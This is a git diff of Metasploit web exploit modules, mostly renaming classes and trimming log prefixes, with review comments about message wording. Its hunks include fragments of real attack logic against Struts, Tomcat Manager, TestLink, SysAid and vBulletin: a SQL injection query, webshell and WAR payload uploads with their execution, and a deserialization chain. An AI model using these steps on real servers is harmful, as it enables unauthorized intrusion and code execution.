a/modules/exploits/multi/http/struts_code_exec_classloader.rb +++ b/modules/exploits/multi/http/struts_code_exec_classloader.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking # It's going to manipulate the Class Loader include Msf::Exploit::FileDropper 
@@ -147,13 +147,13 @@ class Metasploit3 < Msf::Exploit::Remote def check_log_file(hint) uri = normalize_uri("/", @jsp_file) - print_status("#{peer} - Waiting for the server to flush the logfile") + print_status("Waiting for the server to flush the logfile") 10.times do |x| select(nil, nil, nil, 2) # Now make a request to trigger payload - vprint_status("#{peer} - Countdown #{10-x}...") + vprint_status("Countdown #{10-x}...") res = dump_line(uri) # Failure. The request timed out or the server went away. @@ -161,7 +161,7 @@ class Metasploit3 < Msf::Exploit::Remote # Success if the server has flushed all the sent commands to the jsp file if res.code == 200 && res.body && res.body.to_s =~ /#{hint}/ - print_good("#{peer} - Log file flushed at http://#{peer}/#{@jsp_file}") + print_good("Log file flushed at http://#{peer}/#{@jsp_file}") return true end end @@ -225,7 +225,7 @@ class Metasploit3 < Msf::Exploit::Remote self.file_contents = payload.encoded print_status("JSP payload available on #{unc}...") - print_status("#{peer} - Modifying Class Loader...") + print_status("Modifying Class Loader...") send_request_cgi({ 'uri' => normalize_uri(target_uri.path.to_s), 'version' => '1.1', @@ -238,7 +238,7 @@ class Metasploit3 < Msf::Exploit::Remote jsp_shell = target_uri.path.to_s.split('/')[0..-2].join('/') jsp_shell << "/#{self.file_name}" - print_status("#{peer} - Accessing JSP shell at #{jsp_shell}...") + print_status("Accessing JSP shell at #{jsp_shell}...") send_request_cgi({ 'uri' => normalize_uri(jsp_shell), 'version' => '1.1', @@ -253,7 +253,7 @@ class Metasploit3 < Msf::Exploit::Remote # Modify the Class Loader - print_status("#{peer} - Modifying Class Loader...") + print_status("Modifying Class Loader...") properties = { :directory => 'webapps/ROOT', :prefix => prefix_jsp, 
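Review bot: In the `@@ -161,7 +161,7 @@` hunk the new `print_good("Log file flushed at http://#{peer}/#{@jsp_file}")` hard-codes the `http://` scheme, so the logged URL is wrong whenever the module is run over TLS. If the HTTP client mixin's `ssl` helper is in scope here (the include is not visible in this hunk), derive the scheme from it: `print_good("Log file flushed at #{ssl ? 'https' : 'http'}://#{peer}/#{@jsp_file}")`. The body of `check_log_file` continues outside the hunk.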
@@ -274,11 +274,11 @@ class Metasploit3 < Msf::Exploit::Remote register_files_for_cleanup(@jsp_file) # Prepare the JSP - print_status("#{peer} - Generating JSP...") + print_status("Generating JSP...") jsp = create_jsp # Dump the JSP to the log file - print_status("#{peer} - Dumping JSP into the logfile...") + print_status("Dumping JSP into the logfile...") random_request = rand_text_alphanumeric(3 + rand(3)) uri = normalize_uri('/', random_request) diff --git a/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb b/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb index 83a47cb405..108963ebf6 100644 --- a/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb +++ b/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::CmdStager diff --git a/modules/exploits/multi/http/struts_code_exec_parameters.rb b/modules/exploits/multi/http/struts_code_exec_parameters.rb index bf8bbb31b9..8fc53b6155 100644 --- a/modules/exploits/multi/http/struts_code_exec_parameters.rb +++ b/modules/exploits/multi/http/struts_code_exec_parameters.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -149,7 +149,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::NoTarget, 'Unsupported target platform!') end - print_status("#{peer} - Uploading exploit to #{payload_exe}") + print_status("Uploading exploit to #{payload_exe}") #Now with all the arch specific stuff set, perform the upload. #109 = length of command string plus the max length of append. sub_from_chunk = 109 + payload_exe.length + datastore['TARGETURI'].length + parameter.length 
@@ -161,7 +161,7 @@ class Metasploit3 < Msf::Exploit::Remote append = true end java_upload_part(pl_exe, payload_exe, append) - print_status("#{peer} - Executing payload") + print_status("Executing payload") execute_command(chmod_cmd) if target['Platform'] == 'linux' execute_command(exec_cmd) register_files_for_cleanup(payload_exe) diff --git a/modules/exploits/multi/http/struts_default_action_mapper.rb b/modules/exploits/multi/http/struts_default_action_mapper.rb index af4acfdf6a..dc6ddf026c 100644 --- a/modules/exploits/multi/http/struts_default_action_mapper.rb +++ b/modules/exploits/multi/http/struts_default_action_mapper.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/struts_dev_mode.rb b/modules/exploits/multi/http/struts_dev_mode.rb index 856973c841..51101ea197 100644 --- a/modules/exploits/multi/http/struts_dev_mode.rb +++ b/modules/exploits/multi/http/struts_dev_mode.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/struts_include_params.rb b/modules/exploits/multi/http/struts_include_params.rb index 555d03f990..14f272491c 100644 --- a/modules/exploits/multi/http/struts_include_params.rb +++ b/modules/exploits/multi/http/struts_include_params.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/stunshell_eval.rb b/modules/exploits/multi/http/stunshell_eval.rb index 6612a08732..e6df8bb6b2 100644 --- a/modules/exploits/multi/http/stunshell_eval.rb +++ b/modules/exploits/multi/http/stunshell_eval.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/stunshell_exec.rb b/modules/exploits/multi/http/stunshell_exec.rb index 33e003d6bd..452faf5481 100644 --- a/modules/exploits/multi/http/stunshell_exec.rb +++ b/modules/exploits/multi/http/stunshell_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/sun_jsws_dav_options.rb b/modules/exploits/multi/http/sun_jsws_dav_options.rb index 4ef79cf5fa..9601ddd0bd 100644 --- a/modules/exploits/multi/http/sun_jsws_dav_options.rb +++ b/modules/exploits/multi/http/sun_jsws_dav_options.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/http/client' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/sysaid_auth_file_upload.rb b/modules/exploits/multi/http/sysaid_auth_file_upload.rb index 4a8a64da2c..50eed593b7 100644 --- a/modules/exploits/multi/http/sysaid_auth_file_upload.rb +++ b/modules/exploits/multi/http/sysaid_auth_file_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -111,7 +111,7 @@ class Metasploit3 < Msf::Exploit::Remote data = post_data.to_s if is_exploit - print_status("#{peer} - Uploading payload...") + print_status("Uploading payload...") end res = send_request_cgi({ 
@@ -125,7 +125,7 @@ class Metasploit3 < Msf::Exploit::Remote if res && res.code == 200 && res.body.to_s =~ /parent.glSelectedImageUrl = \"(.*)\"/ if is_exploit - print_status("#{peer} - Payload uploaded successfully") + print_status("Payload uploaded successfully") end return $1 @@ -139,7 +139,7 @@ class Metasploit3 < Msf::Exploit::Remote return target end - print_status("#{peer} - Determining target") + print_status("Determining target") os_finder_payload = %Q{<html><body><%out.println(System.getProperty("os.name"));%></body><html>} url = upload_payload(os_finder_payload, false) @@ -233,13 +233,13 @@ class Metasploit3 < Msf::Exploit::Remote unless @cookie fail_with(Failure::NoAccess, "#{peer} - Unable to authenticate with the provided credentials.") end - print_status("#{peer} - Authentication was successful with the provided credentials.") + print_status("Authentication was successful with the provided credentials.") @my_target = pick_target if @my_target.nil? fail_with(Failure::NoTarget, "#{peer} - Unable to select a target, we must bail.") end - print_status("#{peer} - Selected target #{@my_target.name}") + print_status("Selected target #{@my_target.name}") # When using auto targeting, MSF selects the Windows meterpreter as the default payload. # Fail if this is the case and ask the user to select an appropriate payload. @@ -259,7 +259,7 @@ class Metasploit3 < Msf::Exploit::Remote register_files_for_cleanup('root/' + jsp_path) end - print_status("#{peer} - Executing payload...") + print_status("Executing payload...") send_request_cgi({ 'uri' => normalize_uri(datastore['TARGETURI'], jsp_path), 'method' => 'GET', diff --git a/modules/exploits/multi/http/sysaid_rdslogs_file_upload.rb b/modules/exploits/multi/http/sysaid_rdslogs_file_upload.rb index 2eb0ab33e0..1fe9f34dd9 100644 --- a/modules/exploits/multi/http/sysaid_rdslogs_file_upload.rb +++ b/modules/exploits/multi/http/sysaid_rdslogs_file_upload.rb 
@@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -78,7 +78,7 @@ class Metasploit3 < Msf::Exploit::Remote def send_payload(war_payload, tomcat_path, app_base) # We have to use the Zlib deflate routine as the Metasploit Zip API seems to fail - print_status("#{peer} - Uploading WAR file...") + print_status("Uploading WAR file...") res = send_request_cgi({ 'uri' => normalize_uri(datastore['TARGETURI'], 'rdslogs'), 'method' => 'POST', @@ -91,7 +91,7 @@ class Metasploit3 < Msf::Exploit::Remote # The server either returns a 200 OK when the upload is successful. if res && res.code == 200 - print_status("#{peer} - Upload appears to have been successful, waiting for deployment") + print_status("Upload appears to have been successful, waiting for deployment") else fail_with(Failure::Unknown, "#{peer} - WAR upload failed") end @@ -100,7 +100,7 @@ class Metasploit3 < Msf::Exploit::Remote def exploit # We need to create the upload directories before our first attempt to upload the WAR. - print_status("#{peer} - Creating upload directory") + print_status("Creating upload directory") bogus_file = rand_text_alphanumeric(4 + rand(32 - 4)) send_request_cgi({ 'uri' => normalize_uri(datastore['TARGETURI'], 'rdslogs'), @@ -122,7 +122,7 @@ class Metasploit3 < Msf::Exploit::Remote select(nil, nil, nil, 2) # Now make a request to trigger the newly deployed war - print_status("#{peer} - Attempting to launch payload in deployed WAR...") + print_status("Attempting to launch payload in deployed WAR...") res = send_request_cgi({ 'uri' => normalize_uri(app_base, Rex::Text.rand_text_alpha(rand(8)+8)), 'method' => 'GET' 
@@ -132,7 +132,7 @@ class Metasploit3 < Msf::Exploit::Remote # Success! Triggered the payload, should have a shell incoming return if res.code == 200 end - print_error("#{peer} - Failed to launch payload. Trying one last time with a different path...") + print_error("Failed to launch payload. Trying one last time with a different path...") # OK this might be a Linux server, it's a different traversal path. # Let's try again... @@ -143,7 +143,7 @@ class Metasploit3 < Msf::Exploit::Remote select(nil, nil, nil, 2) # Now make a request to trigger the newly deployed war - print_status("#{peer} - Attempting to launch payload in deployed WAR...") + print_status("Attempting to launch payload in deployed WAR...") res = send_request_cgi({ 'uri' => normalize_uri(app_base, Rex::Text.rand_text_alpha(rand(8)+8)), 'method' => 'GET' diff --git a/modules/exploits/multi/http/testlink_upload_exec.rb b/modules/exploits/multi/http/testlink_upload_exec.rb index b64dc1083e..1ef14c565f 100644 --- a/modules/exploits/multi/http/testlink_upload_exec.rb +++ b/modules/exploits/multi/http/testlink_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -81,7 +81,7 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Detected if res and res.body =~ /TestLink project <a href="http:\/\/testlink\.sourceforge\.net\/docs\/testLink\.php">Home<\/a><br \/>/ return Exploit::CheckCode::Safe rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - vprint_error("#{peer} - Connection failed") + vprint_error("Connection failed") return Exploit::CheckCode::Unknown end return Exploit::CheckCode::Safe 
@@ -158,29 +158,29 @@ class Metasploit3 < Msf::Exploit::Remote # register an account user = rand_text_alphanumeric(rand(10)+6) - print_status("#{peer} - Registering user (#{user})") + print_status("Registering user (#{user})") res = register(base, user, user) if res and res.code == 200 and res.body =~ /\<html\>\<head\>\<\/head\>\<body\>\<script type='text\/javascript'\>location\.href=/ - print_status("#{peer} - Registered successfully") + print_status("Registered successfully") else - print_error("#{peer} - Registration failed") + print_error("Registration failed") return end # login - print_status("#{peer} - Authenticating user (#{user})") + print_status("Authenticating user (#{user})") res = login(base, user, user) if res and res.code == 200 and res.body =~ /\<html\>\<head\>\<\/head\>\<body\>\<script type='text\/javascript'\>location\.href=/ - print_status("#{peer} - Authenticated successfully") + print_status("Authenticated successfully") else - print_error("#{peer} - Authentication failed") + print_error("Authentication failed") return end # set id and table name id = rand(1000)+1 table = 'nodes_hierarchy' - print_status("#{peer} - Setting id (#{id}) and table name (#{table})") + print_status("Setting id (#{id}) and table name (#{table})") begin res = send_request_cgi({ 'method' => 'GET', 
@@ -188,35 +188,35 @@ class Metasploit3 < Msf::Exploit::Remote 'cookie' => datastore['COOKIE'], }) if res and res.code == 200 - print_status("#{peer} - Setting id and table name successfully") + print_status("Setting id and table name successfully") else - print_error("#{peer} - Setting id and table name failed") + print_error("Setting id and table name failed") return end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - print_error("#{peer} - Connection failed") + print_error("Connection failed") return end # upload PHP payload to ./upload_area/nodes_hierarchy/[id]/ - print_status("#{peer} - Uploading PHP payload (#{payload.encoded.length.to_s} bytes)") + print_status("Uploading PHP payload (#{payload.encoded.length.to_s} bytes)") fname = rand_text_alphanumeric(rand(10)+6) + '.php' php = %Q|<?php #{payload.encoded} ?>| begin res = upload(base, fname, php) if res and res.code == 200 and res.body =~ /<p>File uploaded<\/p>/ - print_good("#{peer} - File uploaded successfully") + print_good("File uploaded successfully") else - print_error("#{peer} - Uploading PHP payload failed") + print_error("Uploading PHP payload failed") return end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - print_error("#{peer} - Connection failed") + print_error("Connection failed") return end # attempt to retrieve real file name from directory index - print_status("#{peer} - Retrieving real file name from directory index.") + print_status("Retrieving real file name from directory index.") begin res = send_request_cgi({ 'method' => 'GET', 
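Review bot: The success message `print_status("Setting id and table name successfully")` in testlink_upload_exec.rb is ungrammatical and nearly identical to the in-progress message printed just before the request. `print_status("Set id and table name successfully")` would tell the two apart in a log. In the same hunk `#{payload.encoded.length.to_s}` carries a redundant `.to_s`, since interpolation already converts; the same applies to `#{p.length.to_s}` in webpagetest_upload_exec.rb. The method body continues outside the hunk.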
@@ -224,19 +224,19 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 200 and res.body =~ /\b([a-f0-9]+)\.php/ @token = $1 - print_good("#{peer} - Successfully retrieved file name (#{@token})") + print_good("Successfully retrieved file name (#{@token})") else - print_error("#{peer} - Could not retrieve file name from directory index.") + print_error("Could not retrieve file name from directory index.") end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - print_error("#{peer} - Connection failed") + print_error("Connection failed") return end # attempt to retrieve real file name from the database if @token.nil? - print_status("#{peer} - Retrieving real file name from the database.") + print_status("Retrieving real file name from the database.") sqli = normalize_uri(base, "lib/ajax/gettprojectnodes.php") + "?root_node=-1+union+select+file_path,2,3,4,5,6+FROM+attachments+WHERE+file_name='#{fname}'--" begin res = send_request_cgi({ 
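Review bot: `print_error("Could not retrieve file name from directory index.")` is logged at error level, but the method does not return there and falls through to the database lookup guarded by `if @token.nil?`. Someone reading the log sees an error followed by continued activity. `print_warning("Could not retrieve file name from directory index, trying the database")` would describe what actually happens. The database branch in the next hunk does return after its error, so error level is appropriate there.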
@@ -246,26 +246,26 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 200 and res.body =~ /\b([a-f0-9]+)\.php/ @token = $1 - print_good("#{peer} - Successfully retrieved file name (#{@token})") + print_good("Successfully retrieved file name (#{@token})") else - print_error("#{peer} - Could not retrieve file name from the database.") + print_error("Could not retrieve file name from the database.") return end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - print_error("#{peer} - Connection failed") + print_error("Connection failed") return end end # retrieve and execute PHP payload - print_status("#{peer} - Executing payload (#{@token}.php)") + print_status("Executing payload (#{@token}.php)") begin send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(base, "upload_area", "nodes_hierarchy", id, "#{@token}.php") }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - print_error("#{peer} - Connection failed") + print_error("Connection failed") return end diff --git a/modules/exploits/multi/http/tomcat_mgr_deploy.rb b/modules/exploits/multi/http/tomcat_mgr_deploy.rb index 75c6beda9c..8bcde06e80 100644 --- a/modules/exploits/multi/http/tomcat_mgr_deploy.rb +++ b/modules/exploits/multi/http/tomcat_mgr_deploy.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /Apache.*(Coyote|Tomcat)/ ] } diff --git a/modules/exploits/multi/http/tomcat_mgr_upload.rb b/modules/exploits/multi/http/tomcat_mgr_upload.rb index b8b674d5c3..802cb21512 100644 --- a/modules/exploits/multi/http/tomcat_mgr_upload.rb +++ b/modules/exploits/multi/http/tomcat_mgr_upload.rb 
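Review bot: Nothing in the visible hunks of testlink_upload_exec.rb records what a run leaves behind on the tested server: the registered account `user` and the uploaded `#{@token}.php` under `upload_area/nodes_hierarchy/<id>/`. Other modules in this commit call `register_file_for_cleanup` or `register_files_for_cleanup`; whether this module can depends on mixins not shown here. Failing that, a closing line such as `print_warning("Manual cleanup required: account #{user}, file #{@token}.php")` would let the operator remove both and note them in the engagement report. The method begins outside this hunk, so a cleanup step may exist elsewhere.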
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /Apache.*(Coyote|Tomcat)/ ] } @@ -109,7 +109,7 @@ class Metasploit3 < Msf::Exploit::Remote return CheckCode::Unknown if res.nil? if res.code.between?(400, 499) - vprint_error("#{peer} - Server rejected the credentials") + vprint_error("Server rejected the credentials") return CheckCode::Unknown end @@ -124,7 +124,7 @@ class Metasploit3 < Msf::Exploit::Remote arch = detect_arch(res.body) return CheckCode::Unknown unless plat and arch - vprint_status("#{peer} - Tomcat Manager found running on #{plat} platform and #{arch} architecture") + vprint_status("Tomcat Manager found running on #{plat} platform and #{arch} architecture") report_tomcat_credential @@ -138,7 +138,7 @@ class Metasploit3 < Msf::Exploit::Remote # # Find the session ID and the CSRF token # - print_status("#{peer} - Retrieving session ID and CSRF token...") + print_status("Retrieving session ID and CSRF token...") unless access_manager? fail_with(Failure::Unknown, "Unable to access the Tomcat Manager") end @@ -146,7 +146,7 @@ class Metasploit3 < Msf::Exploit::Remote # # Upload Payload # - print_status("#{peer} - Uploading and deploying #{@app_base}...") + print_status("Uploading and deploying #{@app_base}...") if upload_payload report_tomcat_credential else @@ -156,7 +156,7 @@ class Metasploit3 < Msf::Exploit::Remote # # Execute Payload # - print_status("#{peer} - Executing #{@app_base}...") + print_status("Executing #{@app_base}...") unless execute_payload fail_with(Failure::Unknown, "Failed to execute the payload") end 
@@ -171,9 +171,9 @@ class Metasploit3 < Msf::Exploit::Remote # # Delete the deployed payload # - print_status("#{peer} - Undeploying #{@app_base} ...") + print_status("Undeploying #{@app_base} ...") unless undeploy_app - print_warning("#{peer} - Failed to undeploy #{@app_base}...") + print_warning("Failed to undeploy #{@app_base}...") end end @@ -182,7 +182,7 @@ class Metasploit3 < Msf::Exploit::Remote res = send_request_raw('uri' => path) unless res and res.code == 200 - vprint_error("#{peer} - Failed: Error requesting #{path}") + vprint_error("Failed: Error requesting #{path}") return nil end @@ -264,7 +264,7 @@ class Metasploit3 < Msf::Exploit::Remote def find_csrf(res = nil) return "" if res.blank? - vprint_status("#{peer} - Finding CSRF token...") + vprint_status("Finding CSRF token...") body = res.body @@ -343,17 +343,17 @@ class Metasploit3 < Msf::Exploit::Remote def upload_payload war = war_payload upload_path = normalize_uri(target_uri.path.to_s, "html", "upload") - vprint_status("#{peer} - Uploading #{war.length} bytes as #{@app_base}.war ...") + vprint_status("Uploading #{war.length} bytes as #{@app_base}.war ...") res = send_war_payload(upload_path, war) unless res - vprint_error("#{peer} - Upload failed on #{upload_path} [No Response]") + vprint_error("Upload failed on #{upload_path} [No Response]") return false end if res.code < 200 or res.code >= 300 vprint_warning("Warning: The web site asked for authentication: #{res.headers['WWW-Authenticate'] || res.headers['Authentication']}") if res.code == 401 - vprint_error("#{peer} - Upload failed on #{upload_path} [#{res.code} #{res.message}]") + vprint_error("Upload failed on #{upload_path} [#{res.code} #{res.message}]") return false end 
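Review bot: In `upload_payload` (hunk at old line 343 of tomcat_mgr_upload.rb) the context line `vprint_warning("Warning: The web site asked for authentication: ...")` repeats the severity inside the message text. So does `vprint_warning("WARNING: Undeployment failed on #{undeploy_url} [No Response]")` in the hunk at old line 392. Since this commit is already normalising message prefixes, the literal ones could be dropped as well, e.g. `vprint_warning("Undeployment failed on #{undeploy_url} [No Response]")`. The second message in that later hunk says "Deletion failed" for the same operation; using "Undeployment failed" in both would keep the log searchable.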
@@ -363,7 +363,7 @@ class Metasploit3 < Msf::Exploit::Remote def execute_payload jsp_path = normalize_uri(@app_base, "#{@jsp_name}.jsp") - vprint_status("#{peer} - Executing #{jsp_path}...") + vprint_status("Executing #{jsp_path}...") res = send_request_cgi({ 'uri' => jsp_path, @@ -375,12 +375,12 @@ class Metasploit3 < Msf::Exploit::Remote def parse_execute_response(res) unless res - vprint_error("#{peer} - Execution failed on #{@app_base} [No Response]") + vprint_error("Execution failed on #{@app_base} [No Response]") return false end if res and (res.code < 200 or res.code >= 300) - vprint_error("#{peer} - Execution failed on #{@app_base} [#{res.code} #{res.message}]") + vprint_error("Execution failed on #{@app_base} [#{res.code} #{res.message}]") return false end @@ -392,12 +392,12 @@ class Metasploit3 < Msf::Exploit::Remote res = send_request_undeploy(undeploy_url) unless res - vprint_warning("#{peer} - WARNING: Undeployment failed on #{undeploy_url} [No Response]") + vprint_warning("WARNING: Undeployment failed on #{undeploy_url} [No Response]") return false end if res and (res.code < 200 or res.code >= 300) - vprint_warning("#{peer} - Deletion failed on #{undeploy_url} [#{res.code} #{res.message}]") + vprint_warning("Deletion failed on #{undeploy_url} [#{res.code} #{res.message}]") return false end diff --git a/modules/exploits/multi/http/traq_plugin_exec.rb b/modules/exploits/multi/http/traq_plugin_exec.rb index 7c972720cb..a5caeffc82 100644 --- a/modules/exploits/multi/http/traq_plugin_exec.rb +++ b/modules/exploits/multi/http/traq_plugin_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/uptime_file_upload_1.rb b/modules/exploits/multi/http/uptime_file_upload_1.rb index 3e4a56ed4a..e50a1ce5aa 100644 --- a/modules/exploits/multi/http/uptime_file_upload_1.rb 
+++ b/modules/exploits/multi/http/uptime_file_upload_1.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -72,7 +72,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Uploading PHP to Up.Time server") + print_status("Uploading PHP to Up.Time server") uri = target_uri.path @payload_name = "#{rand_text_alpha(5)}.php" @@ -83,7 +83,7 @@ class Metasploit3 < Msf::Exploit::Remote "script" => php_payload }) - print_status("#{peer} - Uploading payload #{@payload_name}") + print_status("Uploading payload #{@payload_name}") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, 'wizards', 'post2file.php'), @@ -94,7 +94,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::UnexpectedReply, "#{peer} - Upload failed") end - print_status("#{peer} - Executing payload #{@payload_name}") + print_status("Executing payload #{@payload_name}") res = send_request_cgi({ 'uri' => normalize_uri(uri, 'wizards', @payload_name), 'method' => 'GET' diff --git a/modules/exploits/multi/http/uptime_file_upload_2.rb b/modules/exploits/multi/http/uptime_file_upload_2.rb index 71fe60d2a0..ebcee62cd3 100644 --- a/modules/exploits/multi/http/uptime_file_upload_2.rb +++ b/modules/exploits/multi/http/uptime_file_upload_2.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'nokogiri' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient include Msf::Exploit::PhpEXE diff --git a/modules/exploits/multi/http/v0pcr3w_exec.rb b/modules/exploits/multi/http/v0pcr3w_exec.rb index 1c94eb7118..c8c5958069 100644 --- a/modules/exploits/multi/http/v0pcr3w_exec.rb +++ b/modules/exploits/multi/http/v0pcr3w_exec.rb 
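Review bot: `fail_with(Failure::UnexpectedReply, "#{peer} - Upload failed")` in the hunk at old line 94 of uptime_file_upload_1.rb keeps the manual `#{peer} - ` prefix that this commit strips from every `print_*` call around it. If the prefix is now added centrally (the change implies this, but the hunks do not show it), the failure message is either formatted differently from the status lines or carries the peer twice. The options are `fail_with(Failure::UnexpectedReply, 'Upload failed')` or a one-line comment stating that `fail_with` messages are deliberately left prefixed. The same leftover appears in vbulletin_unserialize.rb, visual_mining_netcharts_upload.rb, vtiger_soap_upload.rb and java_jmx_server.rb.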
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/vbseo_proc_deutf.rb b/modules/exploits/multi/http/vbseo_proc_deutf.rb index be7f303cd8..081b7421fc 100644 --- a/modules/exploits/multi/http/vbseo_proc_deutf.rb +++ b/modules/exploits/multi/http/vbseo_proc_deutf.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/vbulletin_unserialize.rb b/modules/exploits/multi/http/vbulletin_unserialize.rb index 1238434ece..a9183cdb48 100644 --- a/modules/exploits/multi/http/vbulletin_unserialize.rb +++ b/modules/exploits/multi/http/vbulletin_unserialize.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -69,7 +69,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Trying to inferprint the instance...") + print_status("Trying to inferprint the instance...") @my_target = target check_code = check @@ -82,7 +82,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::NoTarget, "#{peer} - Failed to auto detect, try setting a manual target...") end - print_status("#{peer} - Exploiting #{@my_target.name}...") + print_status("Exploiting #{@my_target.name}...") chain = 'O:12:"vB_dB_Result":2:{s:5:"*db";O:' chain << @my_target["chain"].length.to_s diff --git a/modules/exploits/multi/http/visual_mining_netcharts_upload.rb b/modules/exploits/multi/http/visual_mining_netcharts_upload.rb index 9c4c7972c0..7120fa3926 100644 --- a/modules/exploits/multi/http/visual_mining_netcharts_upload.rb +++ b/modules/exploits/multi/http/visual_mining_netcharts_upload.rb 
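Review bot: The status text `Trying to inferprint the instance...` in vbulletin_unserialize.rb (hunk at old line 69) contains a typo that the commit carries over while editing that very line. Presumably "fingerprint" is meant: `print_status("Trying to fingerprint the instance...")`. Log strings get grepped and quoted in reports, so it is cheap to fix while the line is already being touched.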
